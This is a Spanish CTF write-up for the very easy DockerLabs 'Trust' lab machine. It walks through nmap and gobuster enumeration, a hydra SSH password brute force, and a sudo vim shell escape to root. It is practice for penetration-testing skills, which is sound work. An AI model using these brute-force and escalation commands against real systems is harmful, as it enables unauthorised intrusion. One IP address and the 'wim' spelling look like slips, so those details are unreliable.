Trust
Introducción
En este artículo, explicaré cómo resolví el CTF de la máquina virtual Trust. Describo paso a paso las técnicas y herramientas utilizadas para encontrar y explotar las vulnerabilidades presentes.
Información de la Máquina Virtual
- Nombre: Trust
- Autor: El Pingüino de Mario
- Nivel de Dificultad: Muy Fácil
- Descripción: Fecha de creación: 02/04/2024
Paso 0: Instalación/Despliegue
- Descargamos la máquina desde la web de DockerLabs (opens in a new tab).
- Descomprimimos él .zip
unzip trust.zip
- ejecutamos el archivo de bash
sudo bash auto_deplo.sh trust.tar
Paso 1: Reconocimiento
Escaneo de la Red
Al desplegar la máquina me da la IP de la máquina, a sí que me evito el escaneo con Arp
Después creo una nueva carpeta con el nombre de la máquina para posteriormente entrar al directorio y usar la función mkt(Esta crea 4 carpetas, la llamada content, exploits, nmap y scripts) de mi terminal.
mkdir Trust
cd Trust
mkt
Ahora en la carpeta de nmap realizo un escaneo inicial para identificar los puertos abiertos y exportarlos a un archivo.
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts
Para proseguir con la extracción de los puertos que estaban abiertos del archivo
extractPorts allPorts
También para el escaneo de los servicios que corren.
nmap -sCV -p80 172.17.0.2 -oN targeted
Resultado:
Enumeración de Servicios
Ahora se enumeran los directorios de la página web que descubrimos por tener abierto el puerto 80.
gobuster dir -u http://172.17.0.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 200
Resultados:
Esto no das como resultado un archivo llamado secret.php
, el cual lo podemos ver desde el navegador y nos proporciona el siguiente mensaje, el cual es una pista potencial el cual es un nombre de usuario.
Paso 2: Explotación
Se ha identificado un nombre de usuario válido. Podremos probar un ataque de fuerza bruta al protocolo SSH, ya que contamos con el user.
Este sería el comando a utilizar:
hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.18.0.2 -t 4
ya con esto tenemos la contraseña válida para el usuario mario que es ******. Después podemos hacer login en la máquina a través del protocolo SSH
Elevación de Privilegios
El primer comando para la elevación de privilegios es:
sudo -l
mario
puede ejecutar como cualquier usuario el editor Vim.
Después de esto usamos la herramienta searchbins
que nos facilita el acceso a GTFOBins
.
searchbins -b vim -f sudo
Ahora solo falta escribir el comando que nos arroja, el cual es:
sudo wim -c ':!/bin/sh'
Con el cual ya tenemos usuario administrador
Notas
- La máquina tuvo el nivel de dificultad esperado, o sea muy fácil